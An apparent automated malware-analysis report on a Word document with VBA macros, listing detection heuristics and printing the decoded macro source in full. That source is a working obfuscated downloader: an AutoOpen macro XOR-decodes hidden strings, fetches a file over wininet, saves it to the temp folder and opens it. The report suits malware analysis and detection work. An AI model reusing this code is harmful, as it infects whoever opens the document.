MALICIOUS
Risk Score: 90
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is an OLE document containing VBA macros, including an autoopen macro, which is a common technique for initial execution. The CreateObject heuristic firing suggests the macro attempts to instantiate objects to perform malicious actions, likely downloading and executing a second-stage payload. The obfuscated nature of the VBA code and the presence of a benign-looking URL prevent a higher confidence assessment.
Heuristics 5
- VBA macros detected (medium, 2 related findings): OLE_VBA_MACROS. Document contains VBA macro code.
- CreateObject call (high): OLE_VBA_CREATEOBJ. CreateObject call. Matched line in script: Set BRONTE = CreateObject _
- AutoOpen macro (low): OLE_VBA_AUTOOPEN. AutoOpen macro. Matched line in script: Sub autoopen()
- Legacy WordBasic auto-exec macro marker (medium): OLE_LEGACY_WORDBASIC_AUTOEXEC. OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info): EMBEDDED_URL. One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6507 bytes |

SHA-256: 572bc19f47496f9314220a3c49e66bf3d16f8453810da00ed99c8cd3a8b9134d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub InIn()
CALTHA
End Sub
Sub autoopen()
InIn
End Sub
Attribute VB_Name = "FILE6"
Option Explicit
Public Const BRITTANIA = "BRITTANY"
Private Const BRANDI = 8162
Private Const BRANDY As String = "HAZ"
Private Const BREANA = 1
Private Const BREDA = &H4000000
Public Function BRENDA _
(ByVal BREE As String) As Boolean
#If VBA7 _
And Win64 Then
Dim BRETT As LongPtr, BRIANNA As LongPtr
#Else
Dim BRETT As Long, BRIANNA As Long
#End If
Dim BRIAR As Long
Dim BRIDGET As String * BRANDI, BRIELLE As String
Dim BRIER As Integer, BRIONY As Double
BRETT = CAMEO(BRANDY, BREANA, vbNullString, vbNullString, 0)
If BRETT = 0 Then
Exit Function
End If
Dim FiGaMan As Boolean
If BRITANNIA(BRIANNA, BRETT) Then
End If
If BRIANNA = 0 Then
BRIONY = 0
Else
BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
BRIELLE = BRIDGET
Do While BRIAR <> 0
BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
Dim BRITT As Long
For BRITT = 6 To 8
If BRITT = 38 Then End
Next BRITT
BRIELLE = BRIELLE + Mid(BRIDGET, 1, BRIAR)
Loop
BRIONY = Len(BRIELLE): BRIER = FreeFile
Open BREE _
For Binary Access Write _
Lock Write _
As #BRIER
Put #BRIER, _
, BRIELLE
Dim BRITTA As Double
For BRITTA = 2 To 3
If BRITTA = 37 Then End
Next BRITTA
Close #BRIER
End If
BRITTANI BRIANNA
BRITTANI BRETT
BRIELLE = ""
If BRIONY Then
BRENDA = True
End If
End Function
Public _
Function BRITTNEY(BRITTNY _
As _
String)
BROGAN
End Function
Public Function BROGAN()
Dim BRONTE As Object
Set BRONTE = CreateObject _
(BROOK(BROOKE, BROOKLYN))
Dim BRYANNA As Object
Set BRYANNA = BRYONY(BRONTE)
Dim BUFFY
Dim BUNNY
BUNNY = BROOK(BROOKE, BUNTY)
BUFFY = BRYANNA & BUNNY
Dim BURGUNDY As Integer
For BURGUNDY = 6 To 7
If BURGUNDY = 33 Then End
Next BURGUNDY
Dim CADENCE As Integer
For CADENCE = 2 To 3
If CADENCE = 34 Then End
Next CADENCE
If CADY(BRONTE, BUFFY) Then
BRONTE. _
DeleteFile BUFFY
End If
If BRENDA(BUFFY) Then
End If
If CADY(BRONTE, BUFFY) Then
End If
Dim CAELIE
Set CAELIE = CreateObject _
(BROOK _
(BROOKE, CAETLIN))
CAELIE.Open BUFFY
End Function
Public Function CANDICE(CANDIDA As String) As Integer
CANDICE = Len(CANDIDA)
End Function
Attribute VB_Name = "PIDLE0"
Sub CALTHA()
Dim CAMELLIA As Long
Dim CANDIS As Double
For CANDIS = 44 To 46
If CANDIS = 32 Then End
Next CANDIS
CAMELLIA = 89
CALANTHA (CAMELLIA)
End Sub
Public Function BROOK(CAMERON As String, CAMILLA As String) As String
Dim CAMILLE As Integer
Dim CAMMIE As Integer
Dim CAMRYN As Double
For CAMRYN = 1 To 3
If CAMRYN = 32 Then End
Next CAMRYN
Dim CANDACE As Long
Dim CANDI As String
For CANDACE = 1 _
To _
( _
CANDICE _
(CAMILLA) _
/ 2)
CAMILLE = Val("&H" & _
(Mid$(CAMILLA, _
(2 * CANDACE) - 1, 2)))
CAMMIE = Asc(Mid$(CAMERON, _
((CANDACE Mod Len(CAMERON)) + 1), 1))
CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
Next CANDACE
BROOK = CANDI
End Function
Attribute VB_Name = "IDL4"
Public Const CAETLIN = "6750505D5F1E74464055585B544C5B565A"
Public Const BUNTY = "68425A535244051801581F5D4D5D"
Public Const CAITLYN = "5C4C4141091F1A504A4A4716515D1D0B06071A0E011E524A56"
Public Const BROOKLYN = "675B475843445C5857177751595D61404743505576525D575040"
Public Const BROOKE = "3485130560918582947589072346987"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
Public Declare PtrSafe Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
Public Declare PtrSafe Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As LongPtr, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare PtrSafe Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
#Else
Public Declare Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
Public Declare Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
Public Declare Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As Long, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
Public Declare Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
#End If
Public Function BRYONY(ByRef CALANTHE As Object) As Object
Set BRYONY = CALANTHE.GetSpecialFolder(2)
End Function
Sub CALANTHA(CALEIGH As Long)
BRITTNEY ("CALANTHIA")
End Sub
Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
If CAILEIGH.FileExists(CAILYN) Then
CADY = True
Else
CADY = False
End If
End Function
#If VBA7 _
And Win64 Then
Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
#Else
Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
#End If
Dim CALLIDORA As String
CALLIDORA = BROOK(BROOKE, CAITLYN)
CALIDA _
= CALLIE _
( _
CALLA, _
CALLIDORA, vbNullString, _
0, _
BREDA, 0)
BRITANNIA = True
End Function